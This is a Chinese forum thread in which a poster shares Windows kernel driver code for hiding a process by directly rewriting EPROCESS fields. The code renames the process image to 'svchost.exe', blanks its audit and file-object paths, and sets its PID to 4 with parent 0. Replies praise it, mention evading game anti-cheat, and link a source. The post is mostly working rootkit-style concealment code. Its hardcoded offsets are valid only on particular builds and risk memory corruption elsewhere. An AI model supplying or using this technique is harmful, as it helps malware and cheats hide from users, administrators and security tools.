blmk 发表于 2019-10-30 13:27

震惊支持XP-win10的进程隐藏居然是

先上图:驱动执行完毕以后,任务管理器和各类工具里的进程都不见了,那么它到底去哪里了呢?
对,没错,进程名被抹掉了。别人一般会改成另一个进程的名字,我图省事所以直接写成"空"——注意下面代码里实际传的是 L" "(一个空格),并不是真正的空字符串。
上代码
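// Overwrites the image path stored in EPROCESS.SeAuditProcessCreationInfo with
// ProcessName, so anything that reads the audit image name sees the new string.
//
// Process     - referenced EPROCESS whose audit image name is rewritten.
// ProcessName - NUL-terminated replacement path; must fit in the existing buffer.
//
// Returns TRUE when the name was rewritten in place, FALSE when an argument or the
// audit-info pointer is NULL or ProcessName is longer than the existing string.
//
// NOTE(review): 0x468 is the SeAuditProcessCreationInfo offset for ONE specific
// build (undocumented EPROCESS layout); on any other build this reads and writes
// unrelated memory. Resolve the offset per build before use. This is a direct
// kernel-object write (DKOM) and is visible to integrity checks of EPROCESS.
BOOLEAN PathSeAuditProcessCreationInfo(PEPROCESS Process, WCHAR* ProcessName)
{
        PUNICODE_STRING AuditName;
        PUNICODE_STRING LocatedName = NULL;
        size_t          NewBytes;

        if (Process == NULL || ProcessName == NULL)
        {
                return FALSE;
        }

        // The original called SeLocateProcessImageName and freed the result without
        // checking the status; the call is kept for parity, but the pool string it
        // hands back is only freed when the call actually succeeded.
        if (NT_SUCCESS(SeLocateProcessImageName(Process, &LocatedName)) && LocatedName != NULL)
        {
                ExFreePool(LocatedName);
        }

        AuditName = (PUNICODE_STRING)(*(PULONG_PTR)((ULONG_PTR)Process + 0x468)); //+0x468 SeAuditProcessCreationInfo
        if (AuditName == NULL || AuditName->Buffer == NULL)
        {
                return FALSE;
        }

        NewBytes = wcslen(ProcessName) * sizeof(WCHAR);

        // Only rewrite in place: the buffer belongs to the kernel and cannot grow here.
        if (NewBytes > AuditName->Length)
        {
                return FALSE;
        }

        RtlZeroMemory(AuditName->Buffer, AuditName->MaximumLength);
        RtlCopyMemory(AuditName->Buffer, ProcessName, NewBytes);
        AuditName->Length = (USHORT)NewBytes;
        return TRUE;
}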

对应 EPROCESS 结构体中的 ImageFileName 字段(即 PsGetProcessImageFileName 返回的那段短名称):
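// Replaces the short image name stored in EPROCESS.ImageFileName (the buffer
// returned by PsGetProcessImageFileName) with cName, truncated to fit.
//
// Process - referenced EPROCESS to patch.
// cName   - NUL-terminated ANSI name; anything past 15 characters is dropped so
//           the stored name stays terminated.
//
// Returns TRUE on success, FALSE if an argument is NULL or the image-name pointer
// could not be obtained. Truncation is silent.
//
// NOTE(review): ImageFileName is a short fixed-size array inside EPROCESS and its
// exact size differs between builds (the post claims XP through Win10). This writes
// sizeof(szNameBuff) = 16 bytes, as the original did; confirm against the target
// build's layout that the write does not spill into the field that follows it.
BOOLEAN PathImageFileName(PEPROCESS Process, char* cName)
{
        char   szNameBuff[16] = { 0 };
        UCHAR* szProcessBuff = NULL;
        size_t cNamelen = 0;

        if (Process == NULL || cName == NULL)
        {
                return FALSE;
        }

        // Keep one byte for the terminator: the original copied sizeof(szNameBuff)
        // bytes for long names, leaving the stored name unterminated.
        cNamelen = strlen(cName);
        if (cNamelen > sizeof(szNameBuff) - 1)
        {
                cNamelen = sizeof(szNameBuff) - 1;
        }
        RtlCopyMemory(szNameBuff, cName, cNamelen);

        szProcessBuff = PsGetProcessImageFileName(Process);
        if (szProcessBuff == NULL)
        {
                return FALSE;
        }

        RtlZeroMemory(szProcessBuff, sizeof(szNameBuff));
        RtlCopyMemory(szProcessBuff, szNameBuff, sizeof(szNameBuff));

        return TRUE;
}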

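// Rewrites the FileName of the FILE_OBJECT referenced by EPROCESS.ImageFilePointer
// so the image path reported through that object becomes szFullName. If the
// existing buffer has room the string is rewritten in place; otherwise a fresh
// NonPagedPool buffer of MAX_PATH WCHARs is installed.
//
// Process    - referenced EPROCESS to patch.
// szFullName - NUL-terminated replacement path, at most MAX_PATH WCHARs.
//
// Returns true on success; false if an argument is NULL, ImageFilePointer is NULL,
// szFullName exceeds MAX_PATH WCHARs, or the pool allocation fails.
//
// NOTE(review): 0x448 is the ImageFilePointer offset for one specific Win10 build
// (the post says the member appears to exist only on Win10); verify per build.
// Replacing FileName.Buffer orphans the buffer the I/O manager owns (it is never
// freed here) and hands the object a pool block it did not allocate, which will
// presumably be released by the I/O manager on close - confirm that is acceptable.
// The FILE_OBJECT is shared by everything referencing this image, so the change
// is not scoped to one process.
bool Win10ImageNamePoint(PEPROCESS Process, WCHAR* szFullName)
{
        PFILE_OBJECT pFileObject;
        WCHAR*       szNewFullName;
        size_t       NewBytes;
        const size_t NewBufBytes = MAX_PATH * sizeof(WCHAR);

        if (Process == NULL || szFullName == NULL)
        {
                return false;
        }

        pFileObject = (PFILE_OBJECT)(*(PULONG_PTR)((ULONG_PTR)Process + 0x448)); //+0x448 ImageFilePointer
        if (pFileObject == NULL)
        {
                return false;
        }

        NewBytes = wcslen(szFullName) * sizeof(WCHAR);

        // Fast path: the current buffer has room, so rewrite it in place.
        // MaximumLength is the real capacity (the original compared against Length,
        // which rejected strings that would have fitted).
        if (pFileObject->FileName.Buffer != NULL && pFileObject->FileName.MaximumLength >= NewBytes)
        {
                RtlZeroMemory(pFileObject->FileName.Buffer, pFileObject->FileName.MaximumLength);
                RtlCopyMemory(pFileObject->FileName.Buffer, szFullName, NewBytes);
                pFileObject->FileName.Length = (USHORT)NewBytes;
                return true;
        }

        // Slow path: install a new buffer. The original allocated unconditionally,
        // never checked for NULL, and copied without bounding NewBytes to the
        // allocation, so a path longer than MAX_PATH overflowed the pool block.
        if (NewBytes > NewBufBytes)
        {
                return false;
        }

        szNewFullName = static_cast<WCHAR*>(ExAllocatePool(NonPagedPool, NewBufBytes));
        if (szNewFullName == NULL)
        {
                return false;
        }

        RtlZeroMemory(szNewFullName, NewBufBytes);
        RtlCopyMemory(szNewFullName, szFullName, NewBytes);
        pFileObject->FileName.Buffer = szNewFullName;
        pFileObject->FileName.Length = (USHORT)NewBytes;
        pFileObject->FileName.MaximumLength = (USHORT)NewBufBytes;
        return true;
}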

ImageFilePointer(+0x448)这个结构体成员似乎只有 Win10 才有;另外代码里写死的这些偏移也只对特定的系统版本有效,换版本需要重新取偏移。

还有很重要的一步:把 EPROCESS 里的 UniqueProcessId 和 InheritedFromUniqueProcessId 分别改成 4 和 0。
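// Overwrites the PID fields kept inside EPROCESS so the process reports itself as
// NewPid with parent NewParentPid. The defaults reproduce the original behaviour:
// PID 4 (normally the System process) with parent 0.
//
// Process      - referenced EPROCESS to patch; a NULL pointer is ignored.
// NewPid       - value written to UniqueProcessId.
// NewParentPid - value written to InheritedFromUniqueProcessId.
//
// NOTE(review): 0x2e8 / 0x3e8 are offsets for one specific 64-bit build and the
// fields are written as 8-byte values, so this is x64-only as written. Only these
// two EPROCESS fields change; anything else that records the PID is untouched, and
// the process now claims PID 4 alongside whatever already owns it.
VOID modifyProcessUniqueProcessId(PEPROCESS Process, ULONGLONG NewPid = 4, ULONGLONG NewParentPid = 0)
{
        if (Process == NULL)
        {
                return;
        }

        // Both fields are 8 bytes wide at these offsets; plain stores write the same
        // bytes the original's RtlCopyMemory calls did.
        *(ULONGLONG*)((ULONGLONG)Process + 0x2e8) = NewPid;        //+0x2e8 UniqueProcessId
        *(ULONGLONG*)((ULONGLONG)Process + 0x3e8) = NewParentPid;  //+0x3e8 InheritedFromUniqueProcessId
}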

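// Applies every patch in this listing to the process identified by pid: short
// image name -> "svchost.exe", FILE_OBJECT path and audit path -> L" " (a single
// space, not an empty string), then PID -> 4 / parent -> 0.
//
// pid - process id to look up with PsLookupProcessByProcessId.
//
// Returns FALSE if the process cannot be found or any patch step reports failure
// (the original discarded the helpers' results and always returned TRUE); TRUE
// otherwise. The EPROCESS reference taken by the lookup is always released.
//
// NOTE(review): the listing originally called PathWin10ImageNamePoint, which is not
// defined anywhere in it; the function defined above is Win10ImageNamePoint. That
// helper reads an EPROCESS member the post says appears to exist only on Win10, so
// this sequence as a whole should not be assumed safe on older builds.
BOOLEAN checkProcessModify(HANDLE pid)
{
        PEPROCESS Process = NULL;
        BOOLEAN   ok = TRUE;

        NTSTATUS status = PsLookupProcessByProcessId(pid, &Process);
        if (!NT_SUCCESS(status))
        {
                return FALSE;
        }

        // Run every step even if an earlier one fails, as the original did, but
        // report any failure to the caller instead of swallowing it.
        ok = PathImageFileName(Process, "svchost.exe") && ok;
        ok = Win10ImageNamePoint(Process, L" ") && ok;
        ok = PathSeAuditProcessCreationInfo(Process, L" ") && ok;
        modifyProcessUniqueProcessId(Process);

        ObDereferenceObject(Process);
        return ok;
}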
附上windbg的效果图

对了,似乎还有 3 环 PEB 结构中的三个链表没断,不过那部分在 3 环就可以做。

qingjie2010 发表于 2019-10-30 13:45

学习学习了,吾爱油腻更精彩~

ZuiShuai-Song 发表于 2019-10-30 13:50

建议你去UC震惊部上班

wgy1213 发表于 2019-10-30 13:53

真厉害 这么牛

逝去的流梦 发表于 2019-10-30 14:13

你好,你已经被UC震惊部录取了,工资随便开,明天上午8点到我们总部报到。如有疑问,请拨打110,谢谢合作。

p6858446 发表于 2019-10-30 14:18

用hidetoolz隐藏了CE还是会被游戏检测出来提示我不要打开与游戏无关的软件,然后闪退~~

mokson 发表于 2019-10-30 21:27

TL90 发表于 2019-10-31 10:29

还是会被检测吧

kz丶cn 发表于 2019-10-31 14:06

https://github.com/zhuhuibeishadiao/PathModification/blob/master/PathModification.c 请注明出处

A学习的小菜鸟 发表于 2021-9-15 20:01

这就是利用内核 API 进行进程隐藏啊,标题搞得这么吓人,还以为是新一代的隐藏技术呢